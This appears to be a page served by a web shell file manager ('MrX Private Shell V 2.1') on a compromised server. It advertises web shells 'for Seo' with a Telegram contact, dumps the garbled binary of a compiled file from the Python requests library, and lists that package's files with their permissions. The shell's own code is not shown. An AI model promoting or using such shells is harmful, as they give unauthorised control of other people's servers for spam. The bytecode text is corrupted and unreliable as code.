__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
B
(q�\H � @ s. d Z ddlmZmZmZ d dd�Zdd� ZdS )
z�
requests._internal_utils
~~~~~~~~~~~~~~
Provides utility functions that are consumed internally by Requests
which depend on extremely few external helpers (such as compat)
� )�is_py2�builtin_str�str�asciic C s. t | t�r| }ntr | �|�}n
| �|�}|S )z�Given a string object, regardless of type, returns a representation of
that string in the native string type, encoding and decoding where
necessary. This assumes ASCII unless told otherwise.
)�
isinstancer r �encode�decode)�string�encoding�out� r �I/opt/alt/python37/lib/python3.7/site-packages/requests/_internal_utils.py�to_native_string s
r c C s6 t | t�st�y| �d� dS tk
r0 dS X dS )z�Determine if unicode string only contains ASCII characters.
:param str u_string: unicode string to check. Must be unicode
and not Python 2 `str`.
:rtype: bool
r TFN)r r �AssertionErrorr �UnicodeEncodeError)Zu_stringr r r
�unicode_is_ascii s
r N)r )�__doc__�compatr r r r r r r r r
�<module> s
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| __init__.cpython-37.pyc | File | 3.75 KB | 0644 |
|
| __version__.cpython-37.pyc | File | 516 B | 0644 |
|
| _internal_utils.cpython-37.pyc | File | 1.24 KB | 0644 |
|
| adapters.cpython-37.pyc | File | 16.38 KB | 0644 |
|
| api.cpython-37.pyc | File | 6.49 KB | 0644 |
|
| auth.cpython-37.pyc | File | 8.12 KB | 0644 |
|
| certs.cpython-37.pyc | File | 814 B | 0644 |
|
| compat.cpython-37.pyc | File | 1.64 KB | 0644 |
|
| cookies.cpython-37.pyc | File | 18.31 KB | 0644 |
|
| exceptions.cpython-37.pyc | File | 5.49 KB | 0644 |
|
| help.cpython-37.pyc | File | 2.74 KB | 0644 |
|
| hooks.cpython-37.pyc | File | 941 B | 0644 |
|
| models.cpython-37.pyc | File | 24.04 KB | 0644 |
|
| packages.cpython-37.pyc | File | 672 B | 0644 |
|
| sessions.cpython-37.pyc | File | 19.32 KB | 0644 |
|
| status_codes.cpython-37.pyc | File | 4.09 KB | 0644 |
|
| structures.cpython-37.pyc | File | 4.27 KB | 0644 |
|
| utils.cpython-37.pyc | File | 22.51 KB | 0644 |
|